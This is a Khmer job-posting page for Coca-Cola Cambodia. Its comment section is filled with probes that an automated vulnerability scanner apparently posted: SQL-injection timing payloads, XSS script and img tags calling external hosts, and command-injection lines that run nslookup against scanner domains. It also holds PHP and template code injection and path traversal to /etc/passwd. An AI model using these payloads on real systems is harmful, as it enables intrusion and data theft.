ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ក្រុមហ៊ុន កូកា-កូឡា កម្ពុជា
កូកា-កូឡាមានចក្ខុវិស័យច្បាស់លាស់លើការអភិវឌ្ឍសមត្ថភាពធនធានមនុស្ស យើងកំពុង អនុវត្តគ្រប់យុទ្ធសាស្ត្រ ដើម្បីបើកសក្តានុពលបុគ្គលិក ទៅតាមសមត្ថភាពដែលពួកគាត់មាន និងជ្រោមជ្រែងឲ្យសម្រេច ឧត្តមភាពខ្ពស់បំផុត ។ រៀងរាល់ឆ្នាំ យើងបន្តវិនិយោគ លើការអភិវឌ្ឍសមត្ថភាពបុគ្គលិក ចំណាយជាង ១០% នៃប្រាក់ចំណេញប្រចាំឆ្នាំ ផ្តល់ឱកាសហ្វឹកហាត់ការងារ មុនចូលកាន់តំណែងថ្មី បង្កើតបរិយាកាសការងារល្អ ជាមួយការិយាល័យស្តង់ដារពិភពលោក ។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 72

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 9 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 09:41:04


  @@204ns


 • pHqghUme

  2021-05-06 09:40:56


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 09:40:56


  1'"


 • pHqghUme

  2021-05-06 09:40:33


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 09:40:13


  GKWq4mfH')) OR 731=(SELECT 731 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:39:46


  8Wfor5uR') OR 53=(SELECT 53 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:39:30


  dNuF4Yn9' OR 613=(SELECT 613 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:39:14


  -1)) OR 389=(SELECT 389 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:38:57


  -5) OR 671=(SELECT 671 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:38:43


  -5 OR 18=(SELECT 18 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:38:27


  a1xv2DgX'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:38:13


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:37:58


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:37:44


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:37:28


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 09:37:13


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 09:36:51


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 09:36:32


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 09:36:07


  -1" OR 2+336-336-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:36:06


  -1' OR 2+500-500-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:36:06


  -1' OR 2+455-455-1=0+0+0+1 or 'dr2BhxIu'='


 • pHqghUme

  2021-05-06 09:36:05


  -1 OR 2+846-846-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:36:05


  -1 OR 2+963-963-1=0+0+0+1


 • pHqghUme

  2021-05-06 09:36:04


  9GoUHGwB


 • pHqghUme

  2021-05-06 09:35:36


  1


 • pHqghUme

  2021-05-06 09:35:10


  1


 • @@KSRAA

  2021-05-06 09:34:46


  1


 • 1'"

  2021-05-06 09:34:42


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 09:34:41


  1


 • ngO4JHl7')) OR 546=(SELECT 546 FROM PG_SLEEP(15))--

  2021-05-06 09:34:20


  1


 • DZot0A2T') OR 374=(SELECT 374 FROM PG_SLEEP(3))--

  2021-05-06 09:33:56


  1


 • 5fJyIMmY') OR 498=(SELECT 498 FROM PG_SLEEP(15))--

  2021-05-06 09:33:08


  1


 • gnP2Bf36' OR 788=(SELECT 788 FROM PG_SLEEP(15))--

  2021-05-06 09:32:09


  1


 • VsYzgoFB'; waitfor delay '0:0:15' --

  2021-05-06 09:30:59


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 09:30:25


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 09:30:08


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 09:29:43


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 09:29:21


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 09:28:57


  1


 • -1' OR 2+743-743-1=0+0+0+1 or 'FoXQzxrP'='

  2021-05-06 09:28:35


  1


 • -1" OR 2+622-622-1=0+0+0+1 --

  2021-05-06 09:28:35


  1


 • -1' OR 2+832-832-1=0+0+0+1 --

  2021-05-06 09:28:34


  1


 • -1 OR 2+697-697-1=0+0+0+1

  2021-05-06 09:28:33


  1


 • -1 OR 2+344-344-1=0+0+0+1 --

  2021-05-06 09:28:32


  1


 • ZuCJorbz

  2021-05-06 09:28:31


  1


 • pHqghUme

  2021-05-06 09:28:11


  1


 • pHqghUme

  2021-05-06 09:27:43


  1


 • pHqghUme

  2021-05-06 09:27:20


  1


 • pHqghUme

  2021-05-06 09:27:16


  1


 • pHqghUme

  2021-05-06 09:27:14


  1


 • pHqghUme

  2021-05-06 09:26:53


  1


 • pHqghUme

  2021-05-06 09:26:30


  1


 • pHqghUme

  2021-05-06 09:26:09


  1


 • pHqghUme

  2021-05-06 09:25:47


  1


 • pHqghUme

  2021-05-06 09:25:27


  1


 • pHqghUme

  2021-05-06 09:25:00


  1


 • pHqghUme

  2021-05-06 09:24:44


  1


 • pHqghUme

  2021-05-06 09:24:24


  1


 • pHqghUme

  2021-05-06 09:24:09


  1


 • pHqghUme

  2021-05-06 09:23:50


  1


 • pHqghUme

  2021-05-06 09:23:49


  1


 • pHqghUme

  2021-05-06 09:23:49


  1


 • pHqghUme

  2021-05-06 09:23:48


  1


 • pHqghUme

  2021-05-06 09:23:48


  1


 • pHqghUme

  2021-05-06 09:23:44


  1


 • pHqghUme

  2021-05-06 09:23:30


  1


 • pHqghUme

  2021-05-06 09:23:12


  1


 • pHqghUme

  2021-05-06 09:22:46


  1


 • pHqghUme

  2021-05-06 09:22:42


  1


 • pHqghUme

  2021-05-06 09:22:41


  1


 • pHqghUme

  2021-05-06 09:22:20


  1


 • pHqghUme

  2021-05-06 09:21:59


  1


 • pHqghUme

  2021-05-06 09:21:39


  1


 • pHqghUme

  2021-05-06 09:21:23


  1


 • pHqghUme

  2021-05-06 09:21:00


  1


 • pHqghUme

  2021-05-06 09:20:55


  1<1JiSGV<


 • pHqghUme

  2021-05-06 09:20:48


  1<img sRc='http://attacker-9689/log.php?


 • pHqghUme

  2021-05-06 09:20:42


  1


 • pHqghUme

  2021-05-06 09:20:41


  1<36gi9X x=9301>


 • pHqghUme

  2021-05-06 09:20:32


  1<ifRAme sRc=9298.com></IfRamE>


 • pHqghUme

  2021-05-06 09:20:31


  1


 • pHqghUme

  2021-05-06 09:20:27


  1<W8SLUA>WCYNQ[!+!]</W8SLUA>


 • pHqghUme

  2021-05-06 09:20:21


  1xOYkJ <ScRiPt >hfWC(9320)</ScRiPt>


 • pHqghUme

  2021-05-06 09:20:15


  1<% contenteditable onresize=hfWC(9950)>


 • pHqghUme

  2021-05-06 09:20:04


  1}body{acu:Expre/**/SSion(hfWC(9333))}


 • pHqghUme

  2021-05-06 09:20:04


  1


 • pHqghUme

  2021-05-06 09:19:54


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 09:19:46


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 09:19:38


  1


 • pHqghUme

  2021-05-06 09:19:37


  1<input autofocus onfocus=hfWC(9173)>


 • pHqghUme

  2021-05-06 09:19:22


  1&lt;ScRiPt&gt;hfWC(9037)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 09:19:15


  1\u003CScRiPt\hfWC(9242)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 09:19:08


  %31%3C%53%63%52%69%50%74%20%3E%68%66%57%43%289740%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 09:19:03


  1


 • pHqghUme

  2021-05-06 09:19:01


  1


 • pHqghUme

  2021-05-06 09:18:59


  1


 • pHqghUme

  2021-05-06 09:18:59


  1<img/src=">" onerror=alert(9890)>


 • pHqghUme

  2021-05-06 09:18:57


  1


 • pHqghUme

  2021-05-06 09:18:56


  1


 • pHqghUme

  2021-05-06 09:18:55


  1


 • pHqghUme

  2021-05-06 09:18:51


  1<img src=xyz OnErRor=hfWC(9539)>


 • pHqghUme

  2021-05-06 09:18:39


  1<img src=//xss.bxss.me/t/dot.gif onload=hfWC(9282)>


 • pHqghUme

  2021-05-06 09:18:31


  1<body onload=hfWC(9570)>


 • pHqghUme

  2021-05-06 09:18:24


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9605'>


 • pHqghUme

  2021-05-06 09:18:17


  1


 • pHqghUme

  2021-05-06 09:18:16


  1<isindex type=image src=1 onerror=hfWC(9180)>


 • pHqghUme

  2021-05-06 09:18:02


  1<ScRiPt >hfWC(9295)</ScRiPt>


 • pHqghUme

  2021-05-06 09:17:52


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9237></ScRiPt>


 • pHqghUme

  2021-05-06 09:17:45


  1<ScRiPt >hfWC(9953)</ScRiPt>


 • pHqghUme

  2021-05-06 09:17:44


  1


 • pHqghUme

  2021-05-06 09:17:32


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%68%66%57%43%28%39%30%33%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 09:17:26


  1<script>hfWC(9934)</script>


 • pHqghUme

  2021-05-06 09:17:16


  1<W0I7CF>HS27Z[!+!]</W0I7CF>


 • pHqghUme

  2021-05-06 09:17:07


  1<ScRiPt >hfWC(9783)</ScRiPt>


 • pHqghUme

  2021-05-06 09:16:58


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 09:16:50


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 09:16:42


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 09:16:34


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 09:16:24


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:16:13


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 09:16:05


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:15:42


  acux5826%C0%BEz1%C0%BCz2a%90bcxuca5826


 • pHqghUme

  2021-05-06 09:15:34


  acu10532%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10532


 • pHqghUme

  2021-05-06 09:15:21


  19210867


 • pHqghUme

  2021-05-06 09:15:08


  '"()&%<acx><ScRiPt >hfWC(9813)</ScRiPt>


 • pHqghUme

  2021-05-06 09:14:55


  1'"()&%<acx><ScRiPt >hfWC(9480)</ScRiPt>


 • pHqghUme<9eYs07<

  2021-05-06 09:14:46


  1


 • pHqghUme<img sRc='http://attacker-9093/log.php?

  2021-05-06 09:14:36


  1


 • pHqghUme<fpEm1d x=9802>

  2021-05-06 09:14:25


  1


 • pHqghUme<ifRAme sRc=9994.com></IfRamE>

  2021-05-06 09:14:15


  1


 • pHqghUme<WF0BOS>X6YUZ[!+!]</WF0BOS>

  2021-05-06 09:14:03


  1


 • pHqghUmeJ7vvX <ScRiPt >hfWC(9978)</ScRiPt>

  2021-05-06 09:13:53


  1


 • pHqghUme<% contenteditable onresize=hfWC(9819)>

  2021-05-06 09:13:45


  1


 • pHqghUme}body{acu:Expre/**/SSion(hfWC(9883))}

  2021-05-06 09:13:36


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 09:13:27


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 09:13:18


  1


 • pHqghUme<input autofocus onfocus=hfWC(9000)>

  2021-05-06 09:13:06


  1


 • pHqghUme&lt;ScRiPt&gt;hfWC(9358)&lt;/sCripT&gt;

  2021-05-06 09:12:48


  1


 • pHqghUme\u003CScRiPt\hfWC(9524)\u003C/sCripT\u003E

  2021-05-06 09:12:33


  1


 • pHqghUme

  2021-05-06 09:12:27


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%68%66%57%43%289884%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 09:12:21


  1


 • pHqghUme<img/src=">" onerror=alert(9069)>

  2021-05-06 09:12:12


  1


 • pHqghUme<img src=xyz OnErRor=hfWC(9259)>

  2021-05-06 09:12:04


  1


 • pHqghUme

  2021-05-06 09:11:58


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=hfWC(9192)>

  2021-05-06 09:11:53


  1


 • pHqghUme<body onload=hfWC(9078)>

  2021-05-06 09:11:42


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9062'>

  2021-05-06 09:11:34


  1


 • pHqghUme<isindex type=image src=1 onerror=hfWC(9490)>

  2021-05-06 09:11:25


  1


 • pHqghUme<ScRiPt >hfWC(9318)</ScRiPt>

  2021-05-06 09:11:10


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9875></ScRiPt>

  2021-05-06 09:11:01


  1


 • pHqghUme<ScRiPt >hfWC(9990)</ScRiPt>

  2021-05-06 09:10:46


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%68%66%57%43%28%39%36%38%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 09:10:38


  1


 • pHqghUme<script>hfWC(9935)</script>

  2021-05-06 09:10:30


  1


 • pHqghUme<WPMR2D>AKDDX[!+!]</WPMR2D>

  2021-05-06 09:10:20


  1


 • pHqghUme<ScRiPt >hfWC(9495)</ScRiPt>

  2021-05-06 09:10:08


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 09:09:54


  1


 • acx__${98991*97996}__::.x

  2021-05-06 09:09:45


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 09:09:36


  1


 • acx{{98991*97996}}xca

  2021-05-06 09:09:27


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 09:09:19


  1


 • <th:t="${acx}#foreach

  2021-05-06 09:09:11


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 09:09:03


  1


 • acux1299%C0%BEz1%C0%BCz2a%90bcxuca1299

  2021-05-06 09:08:54


  1


 • pHqghUme

  2021-05-06 09:08:51


  `(nslookup hitkdlvqowofja94d0.bxss.me||perl -e "gethostbyname('hitkdlvqowofja94d0.bxss.me')")`


 • pHqghUme

  2021-05-06 09:08:50


  |(nslookup hitxklkyvoadcc536b.bxss.me||perl -e "gethostbyname('hitxklkyvoadcc536b.bxss.me')")


 • pHqghUme

  2021-05-06 09:08:44


  $(nslookup hitljnlxomint91d45.bxss.me||perl -e "gethostbyname('hitljnlxomint91d45.bxss.me')")


 • acu3427%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3427

  2021-05-06 09:08:43


  1


 • pHqghUme

  2021-05-06 09:08:42


  (nslookup hitkrfgaxmbekdb58b.bxss.me||perl -e "gethostbyname('hitkrfgaxmbekdb58b.bxss.me')")


 • pHqghUme

  2021-05-06 09:08:40


  |echo ptalqy$()\ svrcvc\nz^xyu||a #' |echo ptalqy$()\ svrcvc\nz^xyu||a #|" |echo ptalqy$()\ svrcvc\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:08:38


  &echo sdjlco$()\ orqkmd\nz^xyu||a #' &echo sdjlco$()\ orqkmd\nz^xyu||a #|" &echo sdjlco$()\ orqkmd\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:08:36


  echo ipgssh$()\ zitfyp\nz^xyu||a #' &echo ipgssh$()\ zitfyp\nz^xyu||a #|" &echo ipgssh$()\ zitfyp\nz^xyu||a #


 • pHqghUme9557592

  2021-05-06 09:08:35


  1


 • `(nslookup hitblzejsaeux0ae21.bxss.me||perl -e "gethostbyname('hitblzejsaeux0ae21.bxss.me')")`

  2021-05-06 09:08:30


  1


 • |(nslookup hitlbbqevskmd6ef70.bxss.me||perl -e "gethostbyname('hitlbbqevskmd6ef70.bxss.me')")

  2021-05-06 09:08:28


  1


 • $(nslookup hitwkyjecmeid827e3.bxss.me||perl -e "gethostbyname('hitwkyjecmeid827e3.bxss.me')")

  2021-05-06 09:08:20


  1


 • (nslookup hitbmupjjlvheb2786.bxss.me||perl -e "gethostbyname('hitbmupjjlvheb2786.bxss.me')")

  2021-05-06 09:08:18


  1


 • '"()&%<acx><ScRiPt >hfWC(9320)</ScRiPt>

  2021-05-06 09:08:17


  1


 • |echo mivoap$()\ aiivcy\nz^xyu||a #' |echo mivoap$()\ aiivcy\nz^xyu||a #|" |echo mivoap$()\ aiivcy\nz^xyu||a #

  2021-05-06 09:08:15


  1


 • &echo evwumq$()\ elmdah\nz^xyu||a #' &echo evwumq$()\ elmdah\nz^xyu||a #|" &echo evwumq$()\ elmdah\nz^xyu||a #

  2021-05-06 09:08:13


  1


 • echo lvtrfo$()\ viyflp\nz^xyu||a #' &echo lvtrfo$()\ viyflp\nz^xyu||a #|" &echo lvtrfo$()\ viyflp\nz^xyu||a #

  2021-05-06 09:08:11


  1


 • pHqghUme'"()&%<acx><ScRiPt >hfWC(9053)</ScRiPt>

  2021-05-06 09:08:07


  1


 • pHqghUme

  2021-05-06 09:08:05


  1


 • pHqghUme

  2021-05-06 09:08:03


  1


 • pHqghUme

  2021-05-06 09:07:57


  1


 • pHqghUme

  2021-05-06 09:07:56


  1


 • pHqghUme

  2021-05-06 09:07:54


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 09:07:53


  1


 • pHqghUme

  2021-05-06 09:07:52


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 09:07:50


  1


 • pHqghUme

  2021-05-06 09:07:49


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 09:07:47


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 09:07:47


  1


 • pHqghUme

  2021-05-06 09:07:46


  1


 • pHqghUme

  2021-05-06 09:07:44


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 09:07:44


  1


 • pHqghUme

  2021-05-06 09:07:41


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • '.print(md5(31337)).'

  2021-05-06 09:07:39


  1


 • pHqghUme

  2021-05-06 09:07:38


  bxss.me


 • pHqghUme

  2021-05-06 09:07:36


  http://bxss.me/t/fit.txt%3F.jpg


 • ${@print(md5(31337))}\

  2021-05-06 09:07:36


  1


 • ${@print(md5(31337))}

  2021-05-06 09:07:34


  1


 • pHqghUme

  2021-05-06 09:07:34


  1


 • pHqghUme

  2021-05-06 09:07:34


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 09:07:33


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 09:07:32


  1


 • pHqghUme

  2021-05-06 09:07:31


  1some_inexistent_file_with_long_name%00.jpg


 • ";print(md5(31337));$a="

  2021-05-06 09:07:31


  1


 • pHqghUme

  2021-05-06 09:07:30


  1


 • pHqghUme

  2021-05-06 09:07:29


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • ';print(md5(31337));$a='

  2021-05-06 09:07:29


  1


 • pHqghUme

  2021-05-06 09:07:28


  ../1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 09:07:27


  1


 • pHqghUme

  2021-05-06 09:07:26


  1


 • bxss.me

  2021-05-06 09:07:26


  1


 • pHqghUme

  2021-05-06 09:07:25


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 09:07:24


  1


 • pHqghUme

  2021-05-06 09:07:23


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 09:07:22


  1


 • pHqghUme

  2021-05-06 09:07:22


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 09:07:21


  1


 • pHqghUme

  2021-05-06 09:07:20


  1


 • pHqghUme

  2021-05-06 09:07:20


  1


 • pHqghUme

  2021-05-06 09:07:20


  1


 • pHqghUme

  2021-05-06 09:07:20


  ../../../../../../../../../../../../../../etc/passwd


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 09:07:19


  1


 • pHqghUme

  2021-05-06 09:07:18


  1


 • ../pHqghUme

  2021-05-06 09:07:18


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 09:07:17


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 09:07:17


  1


 • pHqghUme

  2021-05-06 09:07:17


  1


 • pHqghUme

  2021-05-06 09:07:16


  1


 • pHqghUme

  2021-05-06 09:07:16


  1


 • pHqghUme

  2021-05-06 09:07:15


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 09:07:14


  1


 • pHqghUme

  2021-05-06 09:07:14


  1


 • pHqghUme

  2021-05-06 09:07:13


  1


 • pHqghUme

  2021-05-06 09:07:13


  1


 • pHqghUme

  2021-05-06 09:07:12


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 09:07:12


  1


 • pHqghUme

  2021-05-06 09:07:11


  "+response.write(9027969*9300096)+"


 • pHqghUme

  2021-05-06 09:07:11


  1


 • pHqghUme

  2021-05-06 09:07:11


  1


 • pHqghUme

  2021-05-06 09:07:11


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 09:07:10


  1


 • pHqghUme

  2021-05-06 09:07:10


  1


 • pHqghUme

  2021-05-06 09:07:10


  1&n993706=v902990


 • pHqghUme

  2021-05-06 09:07:09


  '+response.write(9027969*9300096)+'


 • pHqghUme

  2021-05-06 09:07:09


  1


 • pHqghUme

  2021-05-06 09:07:09


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 09:07:08


  1


 • pHqghUme

  2021-05-06 09:07:08


  1


 • pHqghUme

  2021-05-06 09:07:08


  '"()


 • pHqghUme

  2021-05-06 09:07:07


  1


 • pHqghUme

  2021-05-06 09:07:07


  response.write(9027969*9300096)


 • pHqghUme

  2021-05-06 09:07:07


  1


 • pHqghUme

  2021-05-06 09:07:07


  1


 • pHqghUme

  2021-05-06 09:07:07


  )


 • ^(#$!@#$)(()))******

  2021-05-06 09:07:06


  1


 • "+response.write(9468231*9749603)+"

  2021-05-06 09:07:05


  1


 • pHqghUme

  2021-05-06 09:07:05


  1


 • pHqghUme

  2021-05-06 09:07:05


  1


 • pHqghUme

  2021-05-06 09:07:04


  1


 • pHqghUme

  2021-05-06 09:07:03


  1


 • !(()&&!|*|*|

  2021-05-06 09:07:03


  1


 • pHqghUme

  2021-05-06 09:07:02


  1


 • '+response.write(9468231*9749603)+'

  2021-05-06 09:07:02


  1


 • pHqghUme

  2021-05-06 09:07:02


  1


 • pHqghUme

  2021-05-06 09:07:02


  1


 • pHqghUme

  2021-05-06 09:07:02


  '+'A'.concat(70-3).concat(22*4).concat(105).concat(74).concat(101).concat(86)+(require'socket' Socket.gethostbyname('hitad'+'ouebhbsu969bf.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 09:07:02


  1


 • pHqghUme

  2021-05-06 09:07:01


  <!--


 • )

  2021-05-06 09:07:01


  1


 • pHqghUme&n965395=v906163

  2021-05-06 09:07:01


  1


 • pHqghUme

  2021-05-06 09:07:00


  ".gethostbyname(lc("hitvt"."bmioiskqd736b.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(72).chr(104).chr(79)."


 • response.write(9468231*9749603)

  2021-05-06 09:07:00


  1


 • pHqghUme

  2021-05-06 09:07:00


  1


 • pHqghUme

  2021-05-06 09:07:00


  "+"A".concat(70-3).concat(22*4).concat(118).concat(71).concat(121).concat(69)+(require"socket" Socket.gethostbyname("hittp"+"weeydcwv839d8.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 09:07:00


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 09:07:00


  1


 • pHqghUme

  2021-05-06 09:07:00


  1


 • '"()

  2021-05-06 09:07:00


  1


 • pHqghUme

  2021-05-06 09:06:59


  '"


 • pHqghUme

  2021-05-06 09:06:59


  1


 • pHqghUme

  2021-05-06 09:06:58


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 09:06:58


  1


 • <!--

  2021-05-06 09:06:57


  1


 • pHqghUme

  2021-05-06 09:06:57


  1


 • '+'A'.concat(70-3).concat(22*4).concat(100).concat(65).concat(119).concat(84)+(require'socket' Socket.gethostbyname('hitue'+'ejqkmczdd605f.bxss.me.')[3].to_s)+'

  2021-05-06 09:06:57


  1


 • pHqghUme

  2021-05-06 09:06:57


  1


 • pHqghUme

  2021-05-06 09:06:57


  '.gethostbyname(lc('hitvn'.'puvzhlpu1c4fa.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(88).chr(109).chr(66).'


 • pHqghUme

  2021-05-06 09:06:57


  1


 • pHqghUme

  2021-05-06 09:06:56


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 09:06:56


  1


 • ".gethostbyname(lc("hitqq"."eogcrsbme8b20.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(70).chr(99).chr(85)."

  2021-05-06 09:06:55


  1


 • pHqghUme

  2021-05-06 09:06:55


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 09:06:54


  1


 • pHqghUme

  2021-05-06 09:06:54


  1


 • '"

  2021-05-06 09:06:54


  1


 • pHqghUme

  2021-05-06 09:06:54


  1


 • "+"A".concat(70-3).concat(22*4).concat(117).concat(89).concat(107).concat(86)+(require"socket" Socket.gethostbyname("hitfb"+"zgimckpkf421f.bxss.me.")[3].to_s)+"

  2021-05-06 09:06:54


  1


 • pHqghUme

  2021-05-06 09:06:53


  1


 • pHqghUme

  2021-05-06 09:06:52


  1


 • pHqghUme

  2021-05-06 09:06:51


  1


 • pHqghUme

  2021-05-06 09:06:51


  1


 • pHqghUme

  2021-05-06 09:06:51


  1


 • '.gethostbyname(lc('hitfn'.'bchaevbe88564.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(73).chr(107).chr(87).'

  2021-05-06 09:06:51


  1


 • pHqghUme

  2021-05-06 09:06:51


  1


 • pHqghUme

  2021-05-06 09:06:50


  1


 • pHqghUme

  2021-05-06 09:06:50


  1


 • pHqghUme

  2021-05-06 09:06:49


  1


 • pHqghUme

  2021-05-06 09:06:49


  1


 • pHqghUme

  2021-05-06 09:06:49


  1


 • pHqghUme

  2021-05-06 09:06:49


  1


 • pHqghUme

  2021-05-06 09:06:49


  1


 • pHqghUme

  2021-05-06 09:06:49


  1


 • pHqghUme

  2021-05-06 09:06:48


  1


 • pHqghUme

  2021-05-06 09:06:48


  1


 • pHqghUme

  2021-05-06 09:06:47


  1


 • pHqghUme

  2021-05-06 09:06:47


  mPaStCZw


 • pHqghUme

  2021-05-06 09:06:47


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 09:06:47


  1


 • pHqghUme

  2021-05-06 09:06:47


  1


 • pHqghUme

  2021-05-06 09:06:47


  1


 • pHqghUme

  2021-05-06 09:06:47


  1


 • pHqghUme

  2021-05-06 09:06:47


  1


 • pHqghUme

  2021-05-06 09:06:46


  1


 • pHqghUme

  2021-05-06 09:06:46


  1


 • pHqghUme

  2021-05-06 09:06:46


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 09:06:46


  ${10000384+9999215}


 • pHqghUme

  2021-05-06 09:06:45


  1


 • pHqghUme

  2021-05-06 09:06:44


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 09:06:43


  1


 • pHqghUme

  2021-05-06 09:06:43


  1


 • pHqghUme

  2021-05-06 09:06:43


  1


 • pHqghUme

  2021-05-06 09:06:43


  1


 • /xfs.bxss.me

  2021-05-06 09:06:43


  1


 • E8CgxPeO

  2021-05-06 09:06:43


  1


 • pHqghUme

  2021-05-06 09:06:43


  1EptZm4EO


 • ${9999147+10000030}

  2021-05-06 09:06:43


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 09:06:43


  1


